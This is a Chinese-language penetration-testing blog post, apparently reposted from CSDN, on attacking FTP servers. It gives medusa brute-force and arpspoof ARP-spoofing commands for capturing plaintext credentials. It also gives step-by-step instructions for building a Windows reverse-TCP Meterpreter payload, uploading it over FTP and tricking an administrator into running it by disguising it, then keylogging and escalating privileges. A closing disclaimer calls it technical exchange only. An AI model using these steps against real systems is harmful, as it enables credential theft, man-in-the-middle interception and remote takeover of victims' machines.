web渗透--ftp暴力破解,明文、嗅探安全等

时间:2024-03-10 10:07:12

一、 FTP用户名密码暴力破解

    1、知道用户名和密码nc直接相连

    2、知道用户名不知道密码

       medusa工具

       medusa -d 可以查看可以破解模块都有什么

       medusa -h IP地址 -u 用户名 -P 字典 ftp

二、FTP用户名明文密码验证

    1、FTP协议中用户认证的过程,客户端和用户端都是采用的明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。

    2、用wireshark抓包验证明文传输。

        先输入ftp,点击eth0,nc IP地址,USER/PASS登录,接着在wireshark中的数据包中可以看见明文状态下的用户名和密码

三、嗅探FTP用户名明文密码

    1、利用arpspoof进行ARP嗅探

        arpspoof -i eth0 网关 -t 目标IP

        arpspoot -i eth0 192.168.1.1 -t 192.168.1.107

    2、wireshark抓包查看用户名和密码

四、FTP登录后可以做什么

    1、利用metasploit创建反弹shell上传到FTP服务器。可以利用setookit快速生成反弹shell。

    2、步骤(kali中):

        1)、setookit

        2)、选择Create a Payload and Listener

        3)、选择Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on victim and send back to attacker

        4)、(LHOST):kali的地址/监听者的地址

        5)、(PORT):输入你要的设定的端口号。(可以重开终端输入netstat -pantu查看现在使用的端口,避免冲突),在输入回车键以后,会生成payload文件,耐心等待。完成后,会提示是否开启payload监听,根据情况输入。

        6)、重开一个终端,进入/root/.set/文件夹中,查看是否有payload.exe文件

        7)、上传payload.exe文件到ftp服务器。(把payload.exe文件放在实体机桌面,在cmd中进行进入ftp使用命令 ,ftp 目标FTP的IP地址,然后登录,使用put payload.exe文件绝对地址 )

        8)、会在根目录下出现payload.exe文件

        9)、诱惑管理员点击(重命名/改图标等等)

       10)、如果管理员点击,在kali中打开metasploit 然后输入sessions -l,sessions -i 序号

       11)、可以键盘记录、关机、获取更高的权限,shell等等。

 

以上内容仅作为技术交流,不能做非法用途。珍爱生命
————————————————
版权声明:本文为CSDN博主「lao_wine」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/MysteriousMadness/article/details/108250774